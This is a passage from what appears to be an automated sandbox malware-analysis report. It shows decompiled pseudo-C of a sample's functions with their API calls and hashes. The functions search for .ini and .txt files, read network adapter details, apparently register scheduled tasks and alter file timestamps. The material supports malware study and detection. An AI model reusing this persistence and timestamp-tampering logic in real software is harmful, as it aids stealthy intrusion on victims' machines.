                          				signed int _t103;
                          				signed int _t104;
                          				void** _t105;
                          				void* _t106;
                          				signed int _t107;
                          				signed int _t108;
                          				signed int _t109;
                          				signed int _t110;
                          				signed int _t111;
                          				signed int _t112;
                          				struct _WIN32_FIND_DATAW* _t113;
                          				signed int _t120;
                          				void** _t124;
                          
                          				_t93 = _t124[0x29c];
                          				_t108 = 0;
                          				if(_t93 != 0) {
                          					_t70 = _t124[0x29b];
                          					 *0x6f9bd4 = _t93;
                          					_t94 = 0xfffffc00;
                          					while(1) {
                          						_t103 =  *(_t70 + _t94 + 0x400) & 0x0000ffff;
                          						if(_t103 == 0) {
                          							break;
                          						}
                          						 *(_t124 + _t94 + 0x658) = _t103;
                          						_t94 = _t94 + 2;
                          						if(_t94 != 0) {
                          							continue;
                          						} else {
                          							 *((short*)(_t124 + _t94 + 0x656)) = 0;
                          						}
                          						goto L67;
                          					}
                          					 *(_t124 + _t94 + 0x658) = 0;
                          					_t71 =  &(_t124[0x96]);
                          					_t95 = 0x200;
                          					while( *_t71 != 0) {
                          						_t71 =  &(_t71[0]);
                          						_t95 = _t95 - 1;
                          						if(_t95 != 0) {
                          							continue;
                          						} else {
                          						}
                          						goto L67;
                          					}
                          					_t111 = 0;
                          					while(1) {
                          						_t104 = _t111;
                          						_t13 = _t111 + 0x6f9ba4; // 0x2a005c
                          						_t112 =  *(_t111 + _t13) & 0x0000ffff;
                          						if(_t112 == 0) {
                          							break;
                          						}
                          						 *(_t71 + _t104 * 2) = _t112;
                          						_t16 = _t104 + 1; // 0x1
                          						_t111 = _t16;
                          						if(_t95 != _t111) {
                          							continue;
                          						} else {
                          							L12:
                          							 *(_t71 + _t104 * 2) = 0;
                          							L13:
                          							_t108 = 0;
                          						}
                          						goto L67;
                          					}
                          					_t113 =  &(_t124[2]);
                          					 *(_t71 + _t104 * 2) = 0;
                          					_t73 = FindFirstFileW( &(_t124[0x96]), _t113); // executed
                          					_t108 = 0;
                          					 *_t124 = _t73;
                          					if(_t73 != 0xffffffff) {
                          						_t74 = 0xfffffc00;
                          						while( *((short*)(_t124 + _t74 + 0x658)) != 0) {
                          							_t74 = _t74 + 2;
                          							if(_t74 != 0) {
                          								continue;
                          							} else {
                          							}
                          							goto L67;
                          						}
                          						 *((short*)(_t124 + _t74 + 0x656)) = 0;
                          						do {
                          							_t108 = 0;
                          							if((_t124[2] & 0x00000010) != 0) {
                          								goto L64;
                          							} else {
                          								_t77 = 0;
                          								_t105 =  &(_t124[0xc]);
                          								_t96 =  &(_t124[0xd]);
                          								while( *_t96 != 0) {
                          									_t77 = _t77 + 2;
                          									_t96 =  &(_t96[0]);
                          									_t105 =  &(_t105[0]);
                          									if(_t77 != 0x400) {
                          										continue;
                          									} else {
                          										L51:
                          										_t108 = 0;
                          										goto L64;
                          									}
                          									goto L67;
                          								}
                          								_t88 = _t96 - 2;
                          								_t108 = 0;
                          								if(_t88 <=  &(_t124[0xd])) {
                          									goto L64;
                          								} else {
                          									_t108 = 0;
                          									_t120 = 0;
                          									if(( *_t88 & 0x0000ffff) != 0x2e) {
                          										_t92 = 1;
                          										while(1) {
                          											_t102 = _t105;
                          											_t120 = _t92;
                          											if(_t102 <=  &(_t124[0xd])) {
                          												break;
                          											}
                          											_t60 = _t120 + 1; // 0x2
                          											_t92 = _t60;
                          											_t105 = _t102 - 2;
                          											if(( *_t102 & 0x0000ffff) != 0x2e) {
                          												continue;
                          											}
                          											break;
                          										}
                          										_t96 =  &(_t102[1]);
                          										_t113 =  &(_t124[2]);
                          									}
                          									if(_t120 != 3) {
                          										goto L64;
                          									} else {
                          										_t106 =  *_t96;
                          										if(_t106 == 0x6e0069) {
                          											if(_t96[1] != 0x69) {
                          												goto L64;
                          											} else {
                          												goto L21;
                          											}
                          										} else {
                          											if(_t106 != 0x780074) {
                          												goto L64;
                          											} else {
                          												if(_t96[1] == 0x74) {
                          													L21:
                          													_t78 = E006E3180(_t77, 0);
                          													_t124 =  &(_t124[2]);
                          													if(_t78 == 0) {
                          														goto L64;
                          													} else {
                          														_t79 = 0xfffffc00;
                          														while(1) {
                          															_t97 =  *(_t124 + _t79 + 0x658) & 0x0000ffff;
                          															if(_t97 == 0) {
                          																break;
                          															}
                          															 *(_t124 + _t79 + 0xa58) = _t97;
                          															_t79 = _t79 + 2;
                          															if(_t79 != 0) {
                          																continue;
                          															} else {
                          																 *((short*)(_t124 + _t79 + 0xa56)) = 0;
                          																goto L13;
                          															}
                          															goto L67;
                          														}
                          														 *(_t124 + _t79 + 0xa58) = 0;
                          														_t98 = 0x200;
                          														_t71 =  &(_t124[0x196]);
                          														while( *_t71 != 0) {
                          															_t71 =  &(_t71[0]);
                          															_t108 = 0;
                          															_t98 = _t98 - 1;
                          															if(_t98 != 0) {
                          																continue;
                          															} else {
                          															}
                          															goto L67;
                          														}
                          														_t109 = 0;
                          														while(1) {
                          															_t104 = _t109;
                          															_t110 =  *(_t124 + 0x34 + _t109 * 2) & 0x0000ffff;
                          															if(_t110 == 0) {
                          																break;
                          															}
                          															 *(_t71 + _t104 * 2) = _t110;
                          															_t40 = _t104 + 1; // 0x1
                          															_t109 = _t40;
                          															if(_t98 != _t109) {
                          																continue;
                          															} else {
                          																goto L12;
                          															}
                          															goto L67;
                          														}
                          														 *(_t71 + _t104 * 2) = 0;
                          														_push(0);
                          														_push( &(_t124[0x197]));
                          														_t81 = E006EC510( &(_t124[0x197]), _t98);
                          														_t124 =  &(_t124[2]);
                          														if(_t81 == 0) {
                          															goto L51;
                          														} else {
                          															_t108 = _t81;
                          															_t90 = 2;
                          															_t83 = 0xffffffffffffffff;
                          															while( *((short*)(_t124 + _t90 + 0x656)) != 0) {
                          																_t83 = _t83 - 1;
                          																_t90 = _t90 + 2;
                          																if(_t83 != 0xfffffdff) {
                          																	continue;
                          																} else {
                          																}
                          																goto L67;
                          															}
                          															_t124[1] = _t83;
                          															_t84 =  *0x6f9b40; // 0x319000
                          															if(_t84 != 0) {
                          																E006E91E0(_t84);
                          																_t124 =  &(_t124[1]);
                          															}
                          															_t86 = E006E3180(_t90, 0);
                          															_t124 =  &(_t124[2]);
                          															 *0x6f9b40 = _t86;
                          															if( ~(_t124[1]) <= 0) {
                          																if(_t90 != 0) {
                          																	 *_t86 = 0;
                          																}
                          															} else {
                          																_t101 = 0;
                          																while(1) {
                          																	_t107 =  *(_t124 + _t101 + 0x658) & 0x0000ffff;
                          																	if(_t107 == 0) {
                          																		break;
                          																	}
                          																	 *(_t86 + _t101) = _t107;
                          																	_t101 = _t101 + 2;
                          																	if(_t90 != _t101) {
                          																		continue;
                          																	} else {
                          																		 *((short*)(_t86 + _t101 - 2)) = 0;
                          																	}
                          																	goto L67;
                          																}
                          																 *(_t86 + _t101) = 0;
                          																goto L64;
                          															}
                          														}
                          													}
                          												} else {
                          													goto L64;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							goto L67;
                          							L64:
                          							_t75 = FindNextFileW(_t124[1], _t113);
                          						} while (_t108 == 0 && _t75 != 0);
                          						FindClose( *_t124);
                          					}
                          				}
                          				L67:
                          				return _t108;
                          			}

                          APIs
                          • FindFirstFileW.KERNELBASE(?,?), ref: 006EC879
                          • FindNextFileW.KERNEL32(?,?), ref: 006ECAA4
                          • FindClose.KERNEL32 ref: 006ECAB5
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Find$FileHeap$AllocateCloseFirstNextProcess
                          • String ID:
                          • API String ID: 2373226758-0
                          • Opcode ID: 6c9313f2570e43a41ce651680e2c0d85428f829c605c6d0c0397f639154207ef
                          • Instruction ID: 72ab40895d235b738b739d0ca5cd2de1b006f9ba4d94ac39cfdadb26ccdee9f5
                          • Opcode Fuzzy Hash: 6c9313f2570e43a41ce651680e2c0d85428f829c605c6d0c0397f639154207ef
                          • Instruction Fuzzy Hash: 8F81E1715067988AD7209B2AEC457FB73E7BF90324F25443ED8458B3A1EB758843C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E006F6780(void* __ecx) {
                          				intOrPtr _t16;
                          				void* _t17;
                          				void* _t22;
                          				void* _t24;
                          				intOrPtr _t27;
                          				intOrPtr _t32;
                          				void* _t33;
                          				void* _t36;
                          				void* _t37;
                          				intOrPtr _t42;
                          				void* _t45;
                          				void* _t46;
                          				void* _t48;
                          				void* _t49;
                          				void* _t52;
                          				intOrPtr* _t53;
                          				intOrPtr* _t54;
                          				void* _t56;
                          				intOrPtr* _t57;
                          
                          				_t16 =  *0x6f9a88; // 0x2ffc88
                          				_t36 = 0;
                          				 *((intOrPtr*)(_t53 + 8)) = 0x280;
                          				 *_t53 = 0;
                          				 *((intOrPtr*)(_t53 + 4)) = 0;
                          				if(_t16 != 0) {
                          					E006E91E0(_t16);
                          					_t53 = _t53 + 4;
                          					 *0x6f9a88 = 0;
                          				}
                          				_t17 = E006E3180(0x280, 0);
                          				_t54 = _t53 + 8;
                          				_t49 = _t17;
                          				if(_t17 == 0) {
                          					_t45 = _t49;
                          					_t49 = 0;
                          					goto L14;
                          				} else {
                          					_t37 = _t54 + 8;
                          					_t22 =  *0x6f9f0c(_t49, _t37); // executed
                          					if(_t22 != 0x6f) {
                          						_t46 = _t49;
                          						L8:
                          						 *((intOrPtr*)(_t54 + 0xc)) = _t46;
                          						_t6 = _t46 + 8; // 0x8
                          						_push(0x800c);
                          						_push(_t54 + 4);
                          						_push(_t54);
                          						_push(0x194);
                          						_t24 = E006EF800();
                          						_t36 = 0;
                          						if(_t24 == 0) {
                          							L18:
                          							return _t36;
                          						}
                          						_t27 = E006E3180(2 +  *(_t54 + 4) * 4, 0);
                          						_t56 = _t54 + 8;
                          						 *0x6f9a88 = _t27;
                          						if(_t27 == 0) {
                          							goto L18;
                          						}
                          						_t38 = _t56 + 0x10;
                          						E006F4520(_t56 + 0x10, 0x9c);
                          						_t57 = _t56 + 8;
                          						_t52 = 0xffffffe0;
                          						_t48 = 0;
                          						do {
                          							_t42 =  *0x6f9a88; // 0x2ffc88
                          							E006F68E0(_t42 + _t48, 0x100, _t38,  *( *_t57 + _t52 + 0x20) & 0x000000ff);
                          							_t57 = _t57 + 0x10;
                          							_t48 = _t48 + 4;
                          							_t52 = _t52 + 1;
                          						} while (_t52 != 0);
                          						_t32 =  *0x6f9a88; // 0x2ffc88
                          						_t45 =  *((intOrPtr*)(_t57 + 0xc));
                          						_t36 = 1;
                          						 *((short*)(_t32 + 0x80)) = 0;
                          						L14:
                          						_t18 =  *_t54;
                          						if( *_t54 != 0) {
                          							E006E91E0(_t18);
                          							_t54 = _t54 + 4;
                          						}
                          						if(_t45 != 0) {
                          							E006E91E0(_t49);
                          						}
                          						goto L18;
                          					}
                          					_t33 = E006E3180( *((intOrPtr*)(_t54 + 0xc)), _t49);
                          					_t54 = _t54 + 8;
                          					_t45 = _t33;
                          					if(_t33 == 0) {
                          						_t49 = 0;
                          						_t36 = 0;
                          						goto L14;
                          					}
                          					 *0x6f9f0c(_t45, _t37);
                          					_t49 = _t45;
                          					goto L8;
                          				}
                          			}























                          APIs
                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 006F67D4
                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 006F67F8
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: AdaptersInfo$FreeHeap
                          • String ID:
                          • API String ID: 1341788161-0
                          • Opcode ID: 1debb83fe340d56bde674948a0b90f59abcd3d5f012676736a245ce247a1879c
                          • Instruction ID: 891175cb99507a5179271575f43600d8567f582a1fad33d7f5098f4837dc5f87
                          • Opcode Fuzzy Hash: 1debb83fe340d56bde674948a0b90f59abcd3d5f012676736a245ce247a1879c
                          • Instruction Fuzzy Hash: AC3128B1A053096BE7109B65EC85BB7779AAF80388F14443CFA58C7341EA70DD08C7B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          (Rendered basic-block graph for E006E3200, blocks 6e3200 through 6e704f with executed/not-executed colouring, omitted; the edge list is not reproducible as text.)
                          C-Code - Quality: 25%
                          			E006E3200(signed int _a4, signed int _a8, signed int _a12) {
                          				void* _v16;
                          				void* _v20;
                          				char _v600;
                          				char _v612;
                          				char _v716;
                          				char _v764;
                          				struct _SECURITY_ATTRIBUTES* _v768;
                          				struct _SECURITY_ATTRIBUTES* _v772;
                          				signed int _v776;
                          				struct _SECURITY_ATTRIBUTES* _v780;
                          				struct _SECURITY_ATTRIBUTES* _v784;
                          				struct _SECURITY_ATTRIBUTES* _v788;
                          				struct _SECURITY_ATTRIBUTES* _v792;
                          				struct _SECURITY_ATTRIBUTES* _v796;
                          				struct _SECURITY_ATTRIBUTES* _v800;
                          				struct _SECURITY_ATTRIBUTES* _v804;
                          				struct _SECURITY_ATTRIBUTES* _v808;
                          				char _v812;
                          				struct _SECURITY_ATTRIBUTES* _v816;
                          				char _v820;
                          				WCHAR* _v824;
                          				char _v828;
                          				char _v832;
                          				intOrPtr _v912;
                          				char _v916;
                          				intOrPtr _v920;
                          				char _v924;
                          				signed int _v928;
                          				char _v932;
                          				long _v936;
                          				long _v940;
                          				intOrPtr _v944;
                          				intOrPtr _v948;
                          				intOrPtr _v952;
                          				void* _v956;
                          				intOrPtr _v960;
                          				struct _SECURITY_ATTRIBUTES* _v968;
                          				signed int _v972;
                          				intOrPtr _v976;
                          				intOrPtr _v980;
                          				WCHAR* _v984;
                          				char _v988;
                          				intOrPtr _v992;
                          				intOrPtr _v996;
                          				intOrPtr _v1000;
                          				char _v1004;
                          				intOrPtr _v1008;
                          				struct _SECURITY_ATTRIBUTES* _v1012;
                          				intOrPtr _v1016;
                          				intOrPtr* _v1020;
                          				signed int _v1024;
                          				char _v1028;
                          				intOrPtr _v1032;
                          				signed int _v1036;
                          				short _v1040;
                          				intOrPtr _v1044;
                          				char _v1048;
                          				intOrPtr _v1052;
                          				char _v1056;
                          				signed int _v1060;
                          				WCHAR* _v1064;
                          				intOrPtr _v1068;
                          				intOrPtr _v1072;
                          				intOrPtr _v1076;
                          				signed int _v1080;
                          				char _v1084;
                          				long _v1088;
                          				signed int _v1092;
                          				intOrPtr _v1096;
                          				signed int _v1100;
                          				intOrPtr _v1104;
                          				signed int _v1108;
                          				WCHAR* _v1112;
                          				intOrPtr _v1116;
                          				FILETIME* _v1120;
                          				void* _v1124;
                          				intOrPtr _v1128;
                          				intOrPtr _v1132;
                          				intOrPtr _v1136;
                          				signed int* _v1140;
                          				char _v1144;
                          				char _v1148;
                          				char _v1152;
                          				char _v1156;
                          				char _v1160;
                          				signed int _v1164;
                          				FILETIME* _v1168;
                          				void* _v1172;
                          				intOrPtr _v1176;
                          				intOrPtr _v1180;
                          				intOrPtr _v1184;
                          				signed int* _v1188;
                          				signed int _v1192;
                          				WCHAR* _v1196;
                          				intOrPtr _v1200;
                          				WCHAR* _v1204;
                          				intOrPtr _v1208;
                          				intOrPtr _v1212;
                          				intOrPtr* _v1216;
                          				intOrPtr* _v1224;
                          				char _v1228;
                          				signed int* _v1292;
                          				signed int* _v1296;
                          				intOrPtr _v1300;
                          				signed int _v1308;
                          				intOrPtr* _t281;
                          				signed int _t288;
                          				signed int _t291;
                          				signed int _t292;
                          				signed int _t293;
                          				intOrPtr* _t298;
                          				signed int _t299;
                          				void* _t300;
                          				signed int _t302;
                          				signed int _t314;
                          				void* _t315;
                          				signed int _t318;
                          				long _t325;
                          				long _t328;
                          				intOrPtr* _t333;
                          				intOrPtr _t335;
                          				signed int _t336;
                          				signed int _t338;
                          				signed int _t340;
                          				signed int _t349;
                          				signed int _t353;
                          				intOrPtr* _t369;
                          				void* _t371;
                          				signed int _t372;
                          				signed int _t374;
                          				signed int _t386;
                          				signed int _t387;
                          				signed int _t391;
                          				signed int _t392;
                          				signed int _t397;
                          				signed int _t398;
                          				signed int _t402;
                          				signed int _t403;
                          				void* _t410;
                          				void* _t412;
                          				signed int _t413;
                          				signed int _t415;
                          				signed int _t416;
                          				FILETIME* _t419;
                          				char* _t424;
                          				char* _t425;
                          				signed int _t426;
                          				FILETIME* _t441;
                          				signed int* _t464;
                          				signed int _t471;
                          				signed int _t472;
                          				signed int* _t473;
                          				intOrPtr* _t477;
                          				void* _t487;
                          				char* _t489;
                          				intOrPtr* _t491;
                          				intOrPtr* _t492;
                          				FILETIME* _t494;
                          				signed int _t497;
                          				signed int _t498;
                          				intOrPtr* _t499;
                          				signed int _t500;
                          				void* _t501;
                          				signed int _t503;
                          				intOrPtr* _t506;
                          				void* _t508;
                          				signed int* _t511;
                          				char* _t512;
                          				void* _t513;
                          				signed int _t514;
                          				signed int _t518;
                          				void* _t520;
                          				void* _t521;
                          				void* _t522;
                          				void* _t525;
                          				void* _t527;
                          				void* _t532;
                          
                          				if( *0x6f9aa8 != 0) {
                          					_t514 = _t518;
                          					_t520 = (_t518 & 0xfffffff8) - 0x3f0;
                          					_t281 =  *0x6f9aa8; // 0x5b8f68
                          					_v1012 = 0;
                          					_v956 = 0;
                          					_v968 = 0;
                          					_v812 = 0;
                          					_v816 = 0;
                          					_v820 = 0;
                          					_v824 = 0;
                          					_v764 = 0;
                          					_v768 = 0;
                          					_v772 = 0;
                          					_v776 = 0;
                          					_v780 = 0;
                          					_v784 = 0;
                          					_v788 = 0;
                          					_v792 = 0;
                          					_v796 = 0;
                          					_v800 = 0;
                          					_v804 = 0;
                          					_v808 = 0;
                          					_v1020 = _t281;
                          					_v1016 =  *_t281;
                          					_v988 = _v764;
                          					_v972 = _v776;
                          					_v992 = _v784;
                          					_v976 = _v792;
                          					_v996 = _v796;
                          					_v1000 = _v800;
                          					_v980 = _v808;
                          					_v1004 = _v812;
                          					_v1008 = _v816;
                          					_v984 = _v824;
                          					_t288 =  *((intOrPtr*)(_v1016 + 0x28))(_v1020, _v984, _v820, _v1008, _v1004, _v980, _v804, _v1000, _v996, _v976, _v788, _v992, _v780, _v972, _v772, _v768, _v988, _t501, _t487, _t410, _t513);
                          					__eflags = _t288;
                          					if(_t288 < 0) {
                          						_t503 = _t288;
                          						_t489 =  &_v600;
                          						_push(0x91);
                          						goto L29;
                          					} else {
                          						_t298 =  *0x6f9aa8; // 0x5b8f68
                          						_t299 =  *((intOrPtr*)( *_t298 + 0x1c))(_t298, 0,  &_v1080);
                          						__eflags = _t299;
                          						if(_t299 < 0) {
                          							_t503 = _t299;
                          							_t489 =  &_v612;
                          							_push(0x90);
                          							L29:
                          							_push(_t489);
                          							E006F4520();
                          							_t521 = _t520 + 8;
                          							_push(_t503);
                          							_push(_t489);
                          							goto L30;
                          						} else {
                          							_t505 = _a4;
                          							_t300 = E006E3240(_v1092, _a4, 0); // executed
                          							_t522 = _t520 + 0xc;
                          							__eflags = _t300 - 0x3ff;
                          							if(_t300 > 0x3ff) {
                          								_t412 = 0;
                          								__eflags = 0;
                          								 *0x6f9bf8 = 3;
                          								goto L33;
                          							} else {
                          								_t302 = E006E26D0( &_v1048, 1, _t505);
                          								_t525 = _t522 + 0xc;
                          								__eflags = _t302;
                          								if(_t302 == 0) {
                          									_push(0x92);
                          									goto L42;
                          								} else {
                          									_t506 =  &_v612;
                          									E006F4520(_t506, 0x21);
                          									E006F4520( &_v812, 0x20);
                          									_t527 = _t525 + 0x10;
                          									_t415 =  *0x6f9de0;
                          									_t491 =  &_v832;
                          									_v1100 = _v1092;
                          									 *_t415(_t491);
                          									_v916 =  *((intOrPtr*)(_t491 + 8));
                          									_t492 =  &_v956;
                          									_v912 =  *((intOrPtr*)(_t491 + 0xc));
                          									_v924 =  *_t491;
                          									_v920 =  *((intOrPtr*)(_t491 + 4));
                          									 *_t415(_t492);
                          									_v1040 = 8;
                          									_v932 =  *((intOrPtr*)(_t492 + 0xc));
                          									_v940 =  *((intOrPtr*)(_t492 + 4));
                          									_v936 =  *(_t492 + 8);
                          									_v944 =  *_t492;
                          									_t314 =  *0x6f9dd4(_t506);
                          									__eflags = _t314;
                          									_v1036 = _t314;
                          									if(_t314 == 0) {
                          										L66:
                          										asm("int3");
                          										asm("int3");
                          										_push(_t514);
                          										_push(_t415);
                          										_push(_t492);
                          										_push(_t506);
                          										_t416 = 0;
                          										_t315 = CreateFileW(_v1112, 0x100, 1, 0, 3, 0, 0);
                          										__eflags = _t315 - 0xffffffff;
                          										if(_t315 != 0xffffffff) {
                          											_t471 = _a4;
                          											_t441 = 0;
                          											_t508 = _t315;
                          											_t494 = 0;
                          											__eflags = _t471;
                          											if(_t471 != 0) {
                          												_t494 =  &_v1148;
                          												_t328 = 0x989680 *  *_t471 + 0xd53e8000;
                          												__eflags = _t328;
                          												asm("adc edx, ebx");
                          												_t494->dwLowDateTime = _t328;
                          												_t494->dwHighDateTime = 0x989680 *  *_t471 >> 0x20;
                          											}
                          											_t472 = _a8;
                          											__eflags = _t472;
                          											if(_t472 != 0) {
                          												_t441 =  &_v1156;
                          												_t325 = 0x989680 *  *_t472 + 0xd53e8000;
                          												__eflags = _t325;
                          												asm("adc edx, ebx");
                          												_t441->dwLowDateTime = _t325;
                          												_t441->dwHighDateTime = 0x989680 *  *_t472 >> 0x20;
                          											}
                          											__eflags = _a12;
                          											if(_a12 == 0) {
                          												_t419 = 0;
                          												__eflags = 0;
                          											} else {
                          												_t473 = _a12;
                          												_v1168 = _t441;
                          												_v1172 = _t508;
                          												_t419 =  &_v1164;
                          												_t441 = _v1168;
                          												asm("adc edx, edi");
                          												_t508 = _v1172;
                          												_t419->dwLowDateTime = 0x989680 *  *_t473 + 0xd53e8000;
                          												_t419->dwHighDateTime = 0x989680 *  *_t473 >> 0x20;
                          											}
                          											_t318 = SetFileTime(_t508, _t494, _t441, _t419);
                          											__eflags = _t318;
                          											_t279 = _t318 != 0;
                          											__eflags = _t279;
                          											_t416 = 0 | _t279;
                          											CloseHandle(_t508);
                          										}
                          										return _t416;
                          									} else {
                          										_t415 = _v1060;
                          										_v968 = _v1032;
                          										_v976 = _v1040;
                          										_v972 = _v1036;
                          										_v980 = _v1044;
                          										_t333 = E006E5140(0xc);
                          										_t527 = _t527 + 4;
                          										_t506 = _t333;
                          										 *((intOrPtr*)(_t506 + 4)) = 0;
                          										 *(_t506 + 8) = 1;
                          										_t335 =  *0x6f9dd4(_t415);
                          										__eflags = _t415;
                          										 *_t506 = 0;
                          										if(_t415 == 0) {
                          											L11:
                          											_v1068 = _t335;
                          											_v1112 = _t506;
                          											_t336 = E006E5140(0xc);
                          											_t527 = _t527 + 4;
                          											 *(_t336 + 4) = 0;
                          											_t415 = _t336;
                          											 *(_t336 + 8) = 1;
                          											_t338 =  *0x6f9dd4( &_v828);
                          											__eflags = _t338;
                          											 *_t415 = _t338;
                          											if(__eflags == 0) {
                          												goto L66;
                          											} else {
                          												_t477 = _v1120;
                          												_v1076 =  *_t477;
                          												_v1108 = _v928;
                          												_v1060 = _v932;
                          												_v1088 = _v940;
                          												_v1092 = _v944;
                          												_v1096 = _v948;
                          												_v1080 = _v956;
                          												_v1100 = _v976;
                          												_v1104 = _v980;
                          												_v1084 = _v988;
                          												_v1064 = _v984;
                          												_t340 =  *((intOrPtr*)(_v1076 + 0x40))(_t477, _t338, _v1072, 6, _v1084, _v1064, _v1104, _v1100, _v1080, _v952, _v1096, _v1092, 5, _v1088, _v936, _v1060, _v1108,  &_v1056);
                          												asm("lock dec dword [ebx+0x8]");
                          												_t497 = _t340;
                          												_t511 = _v1188;
                          												if(__eflags == 0) {
                          													_t402 =  *_t415;
                          													__eflags = _t402;
                          													if(_t402 != 0) {
                          														 *0x6f9dd8(_t402);
                          														 *_t415 = 0;
                          													}
                          													_t403 =  *(_t415 + 4);
                          													__eflags = _t403;
                          													if(_t403 != 0) {
                          														L006F7400(_t403);
                          														_t527 = _t527 + 4;
                          													}
                          													L006F7400(_t415);
                          													_t527 = _t527 + 4;
                          												}
                          												asm("lock dec dword [esi+0x8]");
                          												_t424 =  &_v924;
                          												if(__eflags == 0) {
                          													_t397 =  *_t511;
                          													__eflags = _t397;
                          													if(_t397 != 0) {
                          														 *0x6f9dd8(_t397);
                          														 *_t511 = 0;
                          													}
                          													_t398 = _t511[1];
                          													__eflags = _t398;
                          													if(_t398 != 0) {
                          														L006F7400(_t398);
                          														_t527 = _t527 + 4;
                          													}
                          													L006F7400(_t511);
                          													_t527 = _t527 + 4;
                          												}
                          												_t506 =  *0x6f9ddc;
                          												 *_t506( &_v1124);
                          												 *_t506( &_v1048);
                          												 *_t506(_t424);
                          												__eflags = _t497;
                          												if(_t497 < 0) {
                          													__eflags = _t497 - 0x80070005;
                          													if(_t497 != 0x80070005) {
                          														_t512 =  &_v716;
                          														E006F4520( &_v716, 0x94);
                          														_t521 = _t527 + 8;
                          														_push(_t497);
                          														goto L63;
                          													} else {
                          														_t349 = E006E26D0( &_v1152, 0, _a4);
                          														_t525 = _t527 + 0xc;
                          														__eflags = _t349;
                          														if(_t349 == 0) {
                          															_push(0x93);
                          															L42:
                          															_push( *0x6f9bb8);
                          															E006F4520();
                          															_t522 = _t525 + 8;
                          															goto L31;
                          														} else {
                          															E006F4520( &_v916, 0x20);
                          															_v1204 = _v1196;
                          															_t353 =  *0x6f9de0;
                          															_t498 = _t353;
                          															 *_t353(_t424);
                          															_v1080 = _v928;
                          															_v1088 = _v936;
                          															_v1084 = _v932;
                          															_v1092 = _v940;
                          															 *_t498( &_v1060);
                          															_v1100 = _v1052;
                          															_v1108 = _v1060;
                          															_v1104 = _v1056;
                          															_v1112 = _v1064;
                          															 *_t498( &_v1144);
                          															_t415 = _v1164;
                          															_v1120 = _v1136;
                          															_v1128 = _v1144;
                          															_v1124 = _v1140;
                          															_v1132 = _v1148;
                          															_t369 = E006E5140(0xc);
                          															_t527 = _t525 + 0xc;
                          															_t492 = _t369;
                          															 *((intOrPtr*)(_t492 + 4)) = 0;
                          															 *(_t492 + 8) = 1;
                          															_t371 =  *0x6f9dd4(_t415);
                          															__eflags = _t415;
                          															_v1216 = _t492;
                          															 *_t492 = 0;
                          															if(_t415 == 0) {
                          																L47:
                          																_v1172 = _t371;
                          																_t372 = E006E5140(0xc);
                          																_t527 = _t527 + 4;
                          																 *(_t372 + 4) = 0;
                          																_t415 = _t372;
                          																 *(_t372 + 8) = 1;
                          																_t374 =  *0x6f9dd4( &_v932);
                          																__eflags = _t374;
                          																 *_t415 = _t374;
                          																if(__eflags == 0) {
                          																	goto L66;
                          																} else {
                          																	_t499 = _v1224;
                          																	_v1180 =  *_t499;
                          																	_v1212 = _v1096;
                          																	_v1164 = _v1100;
                          																	_v1192 = _v1108;
                          																	_v1196 = _v1112;
                          																	_v1200 = _v1116;
                          																	_v1184 = _v1124;
                          																	_v1168 = _v1120;
                          																	_v1204 = _v1128;
                          																	_v1208 = _v1132;
                          																	_v1188 = _v1140;
                          																	_v960 = _v1136;
                          																	_v1296 =  *((intOrPtr*)(_v1180 + 0x40))(_t499, _t374, _v1176, 6, _v1188, _v960, _v1208, _v1204, _v1184, _v1168, _v1200, _v1196, 3, _v1192, _v1104, _v1164, _v1212,  &_v1160);
                          																	asm("lock dec dword [ebx+0x8]");
                          																	if(__eflags == 0) {
                          																		_t391 =  *_t415;
                          																		__eflags = _t391;
                          																		if(_t391 != 0) {
                          																			 *0x6f9dd8(_t391);
                          																			 *_t415 = 0;
                          																		}
                          																		_t392 =  *(_t415 + 4);
                          																		__eflags = _t392;
                          																		if(_t392 != 0) {
                          																			L006F7400(_t392);
                          																			_t527 = _t527 + 4;
                          																		}
                          																		L006F7400(_t415);
                          																		_t527 = _t527 + 4;
                          																	}
                          																	_t464 = _v1292;
                          																	_t500 = _a4;
                          																	_t425 =  &_v1028;
                          																	asm("lock dec dword [ecx+0x8]");
                          																	if(__eflags == 0) {
                          																		_t386 =  *_t464;
                          																		__eflags = _t386;
                          																		if(_t386 != 0) {
                          																			 *0x6f9dd8(_t386);
                          																			_t464 = _v1296;
                          																			 *_t464 = 0;
                          																		}
                          																		_t387 = _t464[1];
                          																		__eflags = _t387;
                          																		if(_t387 != 0) {
                          																			L006F7400(_t387);
                          																			_t464 = _v1292;
                          																			_t527 = _t527 + 4;
                          																		}
                          																		L006F7400(_t464);
                          																		_t527 = _t527 + 4;
                          																	}
                          																	 *_t506( &_v1228);
                          																	 *_t506( &_v1152);
                          																	 *_t506(_t425);
                          																	_t426 = _v1308;
                          																	__eflags = _t426;
                          																	if(_t426 < 0) {
                          																		_t512 =  &_v820;
                          																		E006F4520( &_v820, 0x95);
                          																		_t521 = _t527 + 8;
                          																		_push(_t426);
                          																		L63:
                          																		_push(_t512);
                          																		L30:
                          																		_push(0x200);
